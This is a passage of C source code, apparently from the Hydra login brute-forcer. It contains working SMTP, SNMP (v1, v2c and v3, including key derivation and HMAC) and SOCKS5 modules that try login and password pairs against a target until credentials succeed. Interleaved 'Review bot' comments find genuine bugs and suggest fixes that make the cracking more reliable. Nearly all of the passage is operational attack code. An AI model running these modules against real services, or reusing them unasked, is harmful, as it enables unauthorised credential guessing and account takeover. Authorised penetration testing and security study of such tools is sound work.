hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
}
} else
#endif
{
if (strstr(buf, "235") != NULL) {
hydra_report_found_host(port, ip, "smtp", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
}
free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
void service_smtp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1, i = 0;
int myport = PORT_SMTP, mysslport = PORT_SMTP_SSL, disable_tls = 1;
char *buffer1 = "EHLO hydra\r\n";
char *buffer2 = "HELO hydra\r\n";
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = myport;
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
/* receive initial header */
if ((buf = hydra_receive_line(sock)) == NULL)
hydra_child_exit(2);
if (strstr(buf, "220") == NULL) {
hydra_report(stderr, "[WARNING] SMTP does not allow to connect: %s\n", buf);
free(buf);
hydra_child_exit(2);
}
while (strstr(buf, "220 ") == NULL) {
free(buf);
buf = hydra_receive_line(sock);
}
free(buf);
/* send ehlo and receive/ignore reply */
if (hydra_send(sock, buffer1, strlen(buffer1), 0) < 0)
hydra_child_exit(2);
buf = smtp_read_server_capacity(sock);
if (buf == NULL)
hydra_child_exit(2);
if ((miscptr != NULL) && (strlen(miscptr) > 0)) {
for (i = 0; i < strlen(miscptr); i++)
miscptr[i] = (char) toupper((int) miscptr[i]);
if (strstr(miscptr, "TLS") || strstr(miscptr, "SSL")) {
disable_tls = 0;
}
}
#ifdef LIBOPENSSL
if (!disable_tls) {
/* if we got a positive answer */
if (buf[0] == '2') {
if (strstr(buf, "STARTTLS") != NULL) {
hydra_send(sock, "STARTTLS\r\n", strlen("STARTTLS\r\n"), 0);
free(buf);
buf = hydra_receive_line(sock);
if (buf[0] != '2') {
hydra_report(stderr, "[ERROR] TLS negotiation failed, no answer received from STARTTLS request\n");
} else {
free(buf);
if ((hydra_connect_to_ssl(sock) == -1)) {
if (verbose)
hydra_report(stderr, "[ERROR] Can't use TLS\n");
disable_tls = 1;
run = 1;
break;
} else {
if (verbose)
hydra_report(stderr, "[VERBOSE] TLS connection done\n");
}
/* ask again capability request but in TLS mode */
if (hydra_send(sock, buffer1, strlen(buffer1), 0) < 0)
hydra_child_exit(2);
buf = smtp_read_server_capacity(sock);
if (buf == NULL)
hydra_child_exit(2);
}
} else
hydra_report(stderr, "[ERROR] option to use TLS/SSL failed as it is not supported by the server\n");
} else
hydra_report(stderr, "[ERROR] option to use TLS/SSL failed as it is not supported by the server\n");
}
#endif
if (buf[0] != '2') {
if (hydra_send(sock, buffer2, strlen(buffer2), 0) < 0)
hydra_child_exit(2);
free(buf);
buf = smtp_read_server_capacity(sock);
if (buf == NULL)
hydra_child_exit(2);
}
if ((strstr(buf, "LOGIN") == NULL) && (strstr(buf, "NTLM") != NULL)) {
smtp_auth_mechanism = AUTH_NTLM;
}
#ifdef LIBOPENSSL
if ((strstr(buf, "LOGIN") == NULL) && (strstr(buf, "DIGEST-MD5") != NULL)) {
smtp_auth_mechanism = AUTH_DIGESTMD5;
}
if ((strstr(buf, "LOGIN") == NULL) && (strstr(buf, "CRAM-MD5") != NULL)) {
smtp_auth_mechanism = AUTH_CRAMMD5;
}
#endif
if ((strstr(buf, "LOGIN") == NULL) && (strstr(buf, "PLAIN") != NULL)) {
smtp_auth_mechanism = AUTH_PLAIN;
}
if ((miscptr != NULL) && (strlen(miscptr) > 0)) {
if (strstr(miscptr, "LOGIN"))
smtp_auth_mechanism = AUTH_LOGIN;
if (strstr(miscptr, "PLAIN"))
smtp_auth_mechanism = AUTH_PLAIN;
#ifdef LIBOPENSSL
if (strstr(miscptr, "CRAM-MD5"))
smtp_auth_mechanism = AUTH_CRAMMD5;
if (strstr(miscptr, "DIGEST-MD5"))
smtp_auth_mechanism = AUTH_DIGESTMD5;
#endif
if (strstr(miscptr, "NTLM"))
smtp_auth_mechanism = AUTH_NTLM;
}
if (verbose) {
switch (smtp_auth_mechanism) {
case AUTH_LOGIN:
hydra_report(stderr, "[VERBOSE] using SMTP LOGIN AUTH mechanism\n");
break;
case AUTH_PLAIN:
hydra_report(stderr, "[VERBOSE] using SMTP PLAIN AUTH mechanism\n");
break;
#ifdef LIBOPENSSL
case AUTH_CRAMMD5:
hydra_report(stderr, "[VERBOSE] using SMTP CRAM-MD5 AUTH mechanism\n");
break;
case AUTH_DIGESTMD5:
hydra_report(stderr, "[VERBOSE] using SMTP DIGEST-MD5 AUTH mechanism\n");
break;
#endif
case AUTH_NTLM:
hydra_report(stderr, "[VERBOSE] using SMTP NTLM AUTH mechanism\n");
break;
}
}
free(buf);
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_smtp(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0) {
sock = hydra_disconnect(sock);
}
hydra_child_exit(0);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_smtp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
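
Review bot: In service_smtp, the SSL branch of case 1 connects to `mysslport` but then sets `port = myport;`, so the port handed to start_smtp() and written by hydra_report_found_host() is PORT_SMTP rather than the port actually used, even when the caller supplied one; it should be `port = mysslport;`. The banner loop `while (strstr(buf, "220 ") == NULL)` and the STARTTLS reply check `buf[0] != '2'` also use the result of hydra_receive_line() without a NULL test, so a server that drops the connection mid-greeting causes a NULL dereference; exit with hydra_child_exit(2) there, as the first receive already does.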

580
hydra-snmp.c Normal file

@ -0,0 +1,580 @@
#include "hydra-mod.h"
#ifdef LIBOPENSSL
#include <openssl/hmac.h>
#include <openssl/md5.h>
#include <openssl/sha.h>
#include <openssl/des.h>
#include <openssl/aes.h>
#endif
extern int hydra_data_ready_timed(int socket, long sec, long usec);
extern char *HYDRA_EXIT;
extern int child_head_no;
char snmpv3buf[1024], *snmpv3info = NULL;
int snmpv3infolen = 0, snmpversion = 1, snmpread = 1, hashtype = 1, enctype = 0;
char snmpv3_init[] = { 0x30, 0x3e, 0x02, 0x01, 0x03, 0x30, 0x11, 0x02,
0x04, 0x08, 0x86, 0xdd, 0xf0, 0x02, 0x03, 0x00,
0xff, 0xe3, 0x04, 0x01, 0x04, 0x02, 0x01, 0x03,
0x04, 0x10, 0x30, 0x0e, 0x04, 0x00, 0x02, 0x01,
0x00, 0x02, 0x01, 0x00, 0x04, 0x00, 0x04, 0x00,
0x04, 0x00, 0x30, 0x14, 0x04, 0x00, 0x04, 0x00,
0xa0, 0x0e, 0x02, 0x04, 0x3f, 0x44, 0x5c, 0xbc,
0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x00
};
char snmpv3_get1[] = { 0x30, 0x77, 0x02, 0x01, 0x03, 0x30, 0x11, 0x02,
0x04, 0x08, 0x86, 0xdd, 0xef, 0x02, 0x03, 0x00,
0xff, 0xe3, 0x04, 0x01, 0x05, 0x02, 0x01, 0x03
};
char snmpv3_get2[] = { 0x30, 0x2e, 0x04, 0x0c, 0x80, 0x00, 0x00,
0x09, 0x03, 0x00, 0x00, 0x1f, 0xca, 0x8d, 0x82,
0x1b, 0x04, 0x00, 0xa0, 0x1c, 0x02, 0x04, 0x3f,
0x44, 0x5c, 0xbb, 0x02, 0x01, 0x00, 0x02, 0x01,
0x00, 0x30, 0x0e, 0x30, 0x0c, 0x06, 0x08, 0x2b,
0x06, 0x01, 0x02, 0x01, 0x01, 0x01, 0x00, 0x05,
0x00
};
char snmpv3_nouser[] = { 0x04, 0x00, 0x04, 0x00, 0x04, 0x00 };
struct SNMPV1_A {
char ID;
char len;
char ver[3];
char comid;
char comlen;
};
struct SNMPV1_A snmpv1_a = {
.ID = '\x30',
.len = '\x00',
.ver = "\x02\x01\x00", /* \x02\x01\x01 for snmpv2c, \x02\x01\x03 for snmpv3 */
.comid = '\x04',
.comlen = '\x00'
};
struct SNMPV1_R {
char type[2];
char identid[2];
char ident[4];
char errstat[3];
char errind[3];
char objectid[2];
char object[11];
char value[3];
} snmpv1_r = {
.type = "\xa0\x1b", /* GET */
.identid = "\x02\x04",.ident = "\x1a\x5e\x97\x00", /* random crap :) */
.errstat = "\x02\x01\x00", /* no error */
.errind = "\x02\x01\x00", /* error index 0 */
.objectid = "\x30\x0d",.object = "\x30\x0b\x06\x07\x2b\x06\x01\x02\x01\x01\x01", /* sysDescr */
.value = "\x05\x00" /* we just read, so value = 0 */
};
struct SNMPV1_W {
char type[2];
char identid[2];
char ident[4];
char errstat[3];
char errind[3];
char objectid[2];
char object[12];
char value[8];
} snmpv1_w = {
.type = "\xa3\x21", /* SET */
.identid = "\x02\x04",.ident = "\x1a\x5e\x97\x22", /* random crap :) */
.errstat = "\x02\x01\x00", /* no error */
.errind = "\x02\x01\x00", /* error index 0 */
.objectid = "\x30\x13", /* string */
.object = "\x30\x11\x06\x08\x2b\x06\x01\x02\x01\x01\x05\x00",.value = "\x04\x05Hydra" /* writing hydra :-) */
};
#ifdef LIBOPENSSL
void password_to_key_md5(u_char * password, /* IN */
u_int passwordlen, /* IN */
u_char * engineID, /* IN - pointer to snmpEngineID */
u_int engineLength, /* IN - length of snmpEngineID */
u_char * key) { /* OUT - pointer to caller 16-octet buffer */
MD5_CTX MD;
u_char *cp, password_buf[80], *mypass = password, bpass[17];
u_long password_index = 0, count = 0, i, mylen = passwordlen, myelen = engineLength;
if (mylen < 8) {
memset(bpass, 0, sizeof(bpass));
strcpy(bpass, password);
while (mylen < 8) {
strcat(bpass, password);
mylen += passwordlen;
}
mypass = bpass;
}
if (myelen > 32)
myelen = 32;
MD5_Init(&MD); /* initialize MD5 */
/* Use while loop until we've done 1 Megabyte */
while (count < 1048576) {
cp = password_buf;
for (i = 0; i < 64; i++) {
/* Take the next octet of the password, wrapping */
/* to the beginning of the password as necessary. */
*cp++ = mypass[password_index++ % mylen];
}
MD5_Update(&MD, password_buf, 64);
count += 64;
}
MD5_Final(key, &MD); /* tell MD5 we're done */
/* Now localize the key with the engineID and pass */
/* through MD5 to produce final key */
/* May want to ensure that engineLength <= 32, */
/* otherwise need to use a buffer larger than 64 */
memcpy(password_buf, key, 16);
memcpy(password_buf + 16, engineID, myelen);
memcpy(password_buf + 16 + myelen, key, 16);
MD5_Init(&MD);
MD5_Update(&MD, password_buf, 32 + myelen);
MD5_Final(key, &MD);
return;
}
void password_to_key_sha(u_char * password, /* IN */
u_int passwordlen, /* IN */
u_char * engineID, /* IN - pointer to snmpEngineID */
u_int engineLength, /* IN - length of snmpEngineID */
u_char * key) { /* OUT - pointer to caller 20-octet buffer */
SHA_CTX SH;
u_char *cp, password_buf[80], *mypass = password, bpass[17];
u_long password_index = 0, count = 0, i, mylen = passwordlen, myelen = engineLength;
if (mylen < 8) {
memset(bpass, 0, sizeof(bpass));
strcpy(bpass, password);
while (mylen < 8) {
strcat(bpass, password);
mylen += passwordlen;
}
mypass = bpass;
}
if (myelen > 32)
myelen = 32;
SHA1_Init(&SH); /* initialize SHA */
/* Use while loop until we've done 1 Megabyte */
while (count < 1048576) {
cp = password_buf;
for (i = 0; i < 64; i++) {
/* Take the next octet of the password, wrapping */
/* to the beginning of the password as necessary. */
*cp++ = mypass[password_index++ % mylen];
}
SHA1_Update(&SH, password_buf, 64);
count += 64;
}
SHA1_Final(key, &SH); /* tell SHA we're done */
/* Now localize the key with the engineID and pass */
/* through SHA to produce final key */
/* May want to ensure that engineLength <= 32, */
/* otherwise need to use a buffer larger than 72 */
memcpy(password_buf, key, 20);
memcpy(password_buf + 20, engineID, myelen);
memcpy(password_buf + 20 + myelen, key, 20);
SHA1_Init(&SH);
SHA1_Update(&SH, password_buf, 40 + myelen);
SHA1_Final(key, &SH);
return;
}
#endif
int start_snmp(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "\"\"", *ptr, *login, *pass, buffer[1024], buf[1024], hash[64], key[256], salt[8];
int i, j, k, size, off = 0, off2 = 0, done = 0;
unsigned char initVect[8], privacy_params[8];
int engine_boots = 0;
#ifdef LIBOPENSSL
DES_key_schedule symcbc;
#endif
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
if (snmpversion < 3) {
/* do we attack snmp v1 or v2c? */
if (snmpversion == 2) {
snmpv1_a.ver[2] = '\x01';
}
if (snmpread) {
size = sizeof(snmpv1_r);
} else {
size = sizeof(snmpv1_w);
}
snmpv1_a.comlen = (char) strlen(pass);
snmpv1_a.len = snmpv1_a.comlen + size + sizeof(snmpv1_a) - 3;
i = sizeof(snmpv1_a);
memcpy(buffer, &snmpv1_a, i);
strcpy(buffer + i, pass);
i += strlen(pass);
if (snmpread) {
memcpy(buffer + i, &snmpv1_r, size);
i += sizeof(snmpv1_r);
} else {
memcpy(buffer + i, &snmpv1_w, size);
i += sizeof(snmpv1_w);
}
} else { // snmpv3
if (enctype == 0) {
memcpy(buffer, snmpv3_get1, sizeof(snmpv3_get1));
i = sizeof(snmpv3_get1);
} else {
memcpy(buffer + 1, snmpv3_get1, sizeof(snmpv3_get1));
buffer[0] = buffer[1];
memset(buffer + 1, 0x81, 2);
i = sizeof(snmpv3_get1) + 1;
off2 = 1;
}
memcpy(buffer + i, snmpv3info, snmpv3infolen);
if (hashtype > 0) {
off = 12;
#ifdef LIBOPENSSL
if (hashtype == 1) {
password_to_key_md5(pass, strlen(pass), snmpv3info + 6, snmpv3info[5], key);
} else {
password_to_key_sha(pass, strlen(pass), snmpv3info + 6, snmpv3info[5], key);
}
#endif
if (enctype > 0) {
off += 8;
buffer[20 + off2] = 7;
}
} else {
ptr = login;
login = pass;
pass = ptr;
buffer[20] = 4;
}
buffer[i + 1] = 4 + snmpv3infolen + off + strlen(login);
buffer[i + 3] = 2 + snmpv3infolen + off + strlen(login);
if (enctype == 0)
buffer[1] = 48 + sizeof(snmpv3_get1) + buffer[i + 1];
i += snmpv3infolen;
//printf("2 + %d + %d + %d = 0x%02x\n", off, snmpv3infolen, strlen(login), buffer[1]);
buffer[i] = 0x04;
buffer[i + 1] = strlen(login);
memcpy(buffer + i + 2, login, strlen(login));
i += 2 + strlen(login);
buffer[i] = 0x04;
if (hashtype > 0) {
buffer[i + 1] = 12;
memset(buffer + i + 2, 0, 12);
off = i + 2;
i += 2 + 12;
} else {
buffer[i + 1] = 0;
i += 2;
}
buffer[i] = 0x04;
if (enctype == 0) {
buffer[i + 1] = 0x00;
i += 2;
} else {
buffer[i + 1] = 8;
memcpy(buffer + i + 2, salt, 8); // uninitialized and we dont care
i += 10;
}
if (enctype == 0) {
memcpy(buffer + i, snmpv3_get2, sizeof(snmpv3_get2));
i += sizeof(snmpv3_get2);
} else {
buffer[i] = 4;
buffer[i + 1] = 0x30;
#ifdef LIBOPENSSL
/*
//PrivDES::encrypt(const unsigned char *key,
// const unsigned int /*key_len*///,
// const unsigned char *buffer,
// const unsigned int buffer_len,
// unsigned char *out_buffer,
// unsigned int *out_buffer_len,
// unsigned char *privacy_params,
// unsigned int *privacy_params_len,
// const unsigned long engine_boots,
// const unsigned long /*engine_time*/)
// last 8 bytes of key are used as base for initialization vector */
k = 0;
memcpy((char *) initVect, key + 8, 8);
// put salt in privacy_params
j = htonl(engine_boots);
memcpy(privacy_params, (char *) &j, 4);
memcpy(privacy_params + 4, salt, 4); // ??? correct?
// xor initVect with salt
for (i = 0; i < 8; i++)
initVect[i] ^= privacy_params[i];
des_key_sched((C_Block *) key, symcbc);
des_ncbc_encrypt(snmpv3_get2 + 2, buf, sizeof(snmpv3_get2) - 2, symcbc, (C_Block *) (initVect), DES_ENCRYPT);
#endif
/* for (i = 0; i <= sizeof(snmpv3_get2) - 8; i += 8) {
des_ncbc_encrypt(snmpv3_get2 + i, buf + i, 8, (C_Block*)(initVect), DES_ENCRYPT);
}
// last part of buffer
if (buffer_len % 8) {
unsigned char tmp_buf[8];
unsigned char *tmp_buf_ptr = tmp_buf;
int start = buffer_len - (buffer_len % 8);
memset(tmp_buf, 0, 8);
for (unsigned int l = start; l < buffer_len; l++)
*tmp_buf_ptr++ = buffer[l];
des_ncbc_encrypt(tmp_buf, buf + start, 1, symcbc, (C_Block*)(initVect), DES_ENCRYPT);
*out_buffer_len = buffer_len + 8 - (buffer_len % 8);
} else
*out_buffer_len = buffer_len;
*/
//dummy
k = ((sizeof(snmpv3_get2) - 2) / 8);
if ((sizeof(snmpv3_get2) - 2) % 8 != 0)
k++;
memcpy(buffer + i + 2, buf, k * 8);
i += k * 8 + 2;
}
i++; // just to conform with the snmpv1/2 code
#ifdef LIBOPENSSL
if (hashtype == 1) {
HMAC((EVP_MD *) EVP_md5(), key, 16, buffer, i - 1, hash, NULL);
memcpy(buffer + off, hash, 12);
} else if (hashtype == 2) {
HMAC((EVP_MD *) EVP_sha1(), key, 20, buffer, i - 1, hash, NULL);
memcpy(buffer + off, hash, 12);
}
#endif
}
j = 0;
do {
if (hydra_send(s, buffer, i - 1, 0) < 0)
return 3;
j++;
} while (hydra_data_ready_timed(s, 1, 0) <= 0 && j < 3);
if (hydra_data_ready_timed(s, 5, 0) > 0) {
i = hydra_recv(s, (char *) buf, sizeof(buf));
if (snmpversion < 3) {
/* stolen from ADMsnmp... :P */
for (j = 0; j < i; j++) {
if (buf[j] == '\x04') { /* community name */
for (j = j + buf[j + 1]; j + 2 < i; j++) {
if (buf[j] == '\xa2') { /* PDU Response */
for (; j + 2 < i; j++) {
if (buf[j] == '\x02') { /* ID */
for (j = j + (buf[j + 1]); j + 2 < i; j++) {
if (buf[j] == '\x02') {
if (buf[j + 1] == '\x01') { /* good ! */
hydra_report_found_host(port, ip, "snmp", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
}
}
}
}
}
}
}
}
} else { // snmpv3 reply
off = 0;
if (buf[0] == 0x30) {
if (buf[4] == 0x03 && buf[5] == 0x30)
off = 4;
if (buf[5] == 0x03 && buf[6] == 0x30)
off = 6;
if (buf[6] == 0x03 && buf[7] == 0x30)
off = 6;
}
if (off == 0)
return 3;
if (debug)
printf("[DEBUG] buf[%d + 15] %d\n", off, buf[off + 15]);
k = 3 + off + buf[2 + off];
if ((j = hydra_memsearch(buf + k, buf[k + 3], snmpv3_nouser, sizeof(snmpv3_nouser))) < 0)
if ((j = hydra_memsearch(buf + k, buf[k + 3], login, strlen(login))) >= 0) {
if (snmpv3info[j - 2] == 0x04)
j -= 2;
else
j = -1;
}
if (j >= 0) {
i = buf[k + 3] + 4;
if (i > sizeof(snmpv3info))
i = sizeof(snmpv3info);
memcpy(snmpv3info, buf + k, i);
snmpv3infolen = j;
if (debug)
hydra_dump_asciihex(snmpv3info, snmpv3infolen);
}
if ((buf[off + 15] & 1) == 1) {
if (hashtype == 0)
hydra_report_found_host(port, ip, "snmp3", fp);
else
hydra_report_found_host(port, ip, "snmp", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
} else if ((buf[off + 15] & 5) == 4 && hydra_memsearch(buf, i, snmpv3_nouser, sizeof(snmpv3_nouser)) >= 0) { // user does not exist
if (debug)
printf("[DEBUG] server reply indicates login %s does not\n", login);
hydra_completed_pair_skip();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
}
}
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_snmp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1, i = 0;
int myport = PORT_SNMP;
char *lptr;
if (miscptr != NULL) {
lptr = strtok(miscptr, ":");
while (lptr != NULL) {
if (strcasecmp(lptr, "1") == 0)
snmpversion = 1;
else if (strcasecmp(lptr, "2") == 0)
snmpversion = 2;
else if (strcasecmp(lptr, "3") == 0)
snmpversion = 3;
else if (strcasecmp(lptr, "PLAIN") == 0)
hashtype = 0;
else if (strcasecmp(lptr, "MD5") == 0)
hashtype = 1;
else if (strncasecmp(lptr, "R", 1) == 0)
snmpread = 1;
else if (strncasecmp(lptr, "W", 1) == 0)
snmpread = 0;
else if (strncasecmp(lptr, "SHA", 3) == 0)
hashtype = 2;
else if (strcasecmp(lptr, "DES") == 0)
enctype = 1;
else if (strcasecmp(lptr, "AES") == 0)
enctype = 2;
else {
fprintf(stderr, "[ERROR] unknown optional parameter: %s\n", lptr);
hydra_child_exit(2);
}
lptr = strtok(NULL, ":");
}
}
if (hashtype == 0)
enctype = 0;
if (port != 0)
myport = port;
sock = hydra_connect_udp(ip, myport);
port = myport;
if (debug)
printf("[DEBUG] snmpv%d, isread %d, hashtype %d, enctype %d\n", snmpversion, snmpread, hashtype, enctype);
hydra_register_socket(sp);
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, no socket available\n", (int) getpid());
hydra_child_exit(1);
}
if (snmpversion == 3) {
next_run = 0;
while (snmpv3info == NULL && next_run < 3) {
hydra_send(sock, snmpv3_init, sizeof(snmpv3_init), 0);
if (hydra_data_ready_timed(sock, 5, 0) > 0) {
if ((i = hydra_recv(sock, (char *) snmpv3buf, sizeof(snmpv3buf))) > 30) {
if (snmpv3buf[4] == 3 && snmpv3buf[5] == 0x30); {
snmpv3info = snmpv3buf + 7 + snmpv3buf[6];
snmpv3infolen = snmpv3info[3] + 4;
while (snmpv3info[snmpv3infolen - 2] == 4 && snmpv3info[snmpv3infolen - 1] == 0)
snmpv3infolen -= 2;
if (debug)
hydra_dump_asciihex(snmpv3info, snmpv3infolen);
if (snmpv3info[10] == 3 && child_head_no == 0)
printf("[INFO] Remote device MAC address is %02x:%02x:%02x:%02x:%02x:%02x\n", (unsigned char) snmpv3info[12], (unsigned char) snmpv3info[13],
(unsigned char) snmpv3info[14], (unsigned char) snmpv3info[15], (unsigned char) snmpv3info[16], (unsigned char) snmpv3info[12]);
}
}
}
next_run++;
}
if (snmpv3info == NULL || i < snmpv3info + snmpv3infolen - snmpv3buf) {
hydra_report(stderr, "No valid reply from snmp server, exiting!\n");
hydra_child_exit(2);
}
}
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
run = 3;
while (1) {
switch (run) {
case 1: /* connect and service init function */
next_run = start_snmp(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
int service_snmp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
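
Review bot: In service_snmp the reply check `if (snmpv3buf[4] == 3 && snmpv3buf[5] == 0x30); {` ends in a stray semicolon, so the block that derives snmpv3info and snmpv3infolen from packet bytes runs for any reply longer than 30 bytes; drop the semicolon and check `snmpv3buf[6]` and `snmpv3info[3]` against the received length `i` before using them as offsets. In the same block the MAC address printf passes `snmpv3info[12]` again as its sixth byte where `snmpv3info[17]` is meant. In start_snmp, `sizeof(snmpv3info)` is the size of a `char *`, not of the buffer it points into, so the clamp before `memcpy(snmpv3info, buf + k, i)` cuts the copy to pointer size instead of bounding it by the space left in snmpv3buf. The DES branch also reuses `i` as the counter in `for (i = 0; i < 8; i++)`, which discards the write offset that the later `memcpy(buffer + i + 2, buf, k * 8)` relies on; use a separate loop variable.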

180
hydra-socks5.c Normal file

@ -0,0 +1,180 @@
#include "hydra-mod.h"
/*
RFC: 1928
This module enable bruteforcing for socks5, only following types are supported:
0x00 "No Authentication Required"
0x02 "Username/Password"
*/
extern char *HYDRA_EXIT;
unsigned char *buf;
int fail_cnt;
int start_socks5(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[300];
int pport, fud = 0;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
memcpy(buffer, "\x05\x02\x00\x02", 4);
if (hydra_send(s, buffer, 4, 0) < 0) {
return 1;
}
if ((buf = (unsigned char *) hydra_receive_line(s)) == NULL) {
fail_cnt++;
if (fail_cnt >= 10)
return 5;
return (1);
}
fail_cnt = 0;
if (buf[0] != 5) {
if (buf[0] == 4) {
hydra_report(stderr, "[ERROR] Sorry Socks4 / Socks4a ident is not supported\n");
} else {
hydra_report(stderr, "[ERROR] Socks5 protocol or service shutdown: %s\n", buf);
}
free(buf);
return (4);
}
if (buf[1] == 0 || buf[1] == 32) {
hydra_report(stderr, "[INFO] Socks5 server does NOT require any authentication!\n");
free(buf);
return (4);
}
if (buf[1] != 0x2) {
hydra_report(stderr, "[ERROR] Socks5 protocol or service shutdown: %s\n", buf);
free(buf);
return (4);
}
free(buf);
/* RFC 1929
For username/password authentication the client's authentication request is
field 1: version number, 1 byte (must be 0x01)
*/
snprintf(buffer, sizeof(buffer), "\x01%c%s%c%s", (char) strlen(login), login, (char) strlen(pass), pass);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
if ((buf = (unsigned char *) hydra_receive_line(s)) == NULL)
return (1);
if (buf[1] != 255) {
/* new: false positive check */
free(buf);
pport = htons(port);
if (ip[0] == 16) {
memcpy(buffer, "\x05\x01\x00\x04", 4);
memcpy(buffer + 4, &ip[1], 16);
memcpy(buffer + 20, &pport, 2);
hydra_send(s, buffer, 22, 0);
} else {
memcpy(buffer, "\x05\x01\x00\x01", 4);
memcpy(buffer + 4, &ip[1], 4);
memcpy(buffer + 8, &pport, 2);
hydra_send(s, buffer, 10, 0);
}
if ((buf = (unsigned char *) hydra_receive_line(s)) != NULL) {
if (buf[1] == 0 || buf[1] == 32) {
hydra_report_found_host(port, ip, "socks5", fp);
hydra_completed_pair_found();
fud = 1;
} else if (buf[1] != 2) {
hydra_report_found_host_msg(port, ip, "socks5", fp, "might be a false positive!");
}
}
}
if (buf != NULL)
free(buf);
if (fud == 0)
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
void service_socks5(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_SOCKS5, mysslport = PORT_SOCKS5_SSL;
hydra_register_socket(sp);
if (port != 0)
myport = port;
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(300000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_socks5(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
case 4: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
return;
case 5: /* clean exit, server may blocking connections */
hydra_report(stderr, "[ERROR] Server may blocking connections\n");
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_socks5_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
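
Review bot: In start_socks5 the RFC 1929 request is built with snprintf() and sent with `hydra_send(s, buffer, strlen(buffer), 0)`, but the message is binary: a zero length byte (empty login or password) ends strlen() early and the request goes out truncated. Keep the return value of snprintf() as the send length, and reject logins or passwords longer than 255 bytes instead of letting the `(char) strlen(...)` cast wrap. The reply checks on `buf[0]` and `buf[1]` also index what hydra_receive_line() returned without confirming that two bytes were received.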

198
hydra-ssh.c Normal file
View file

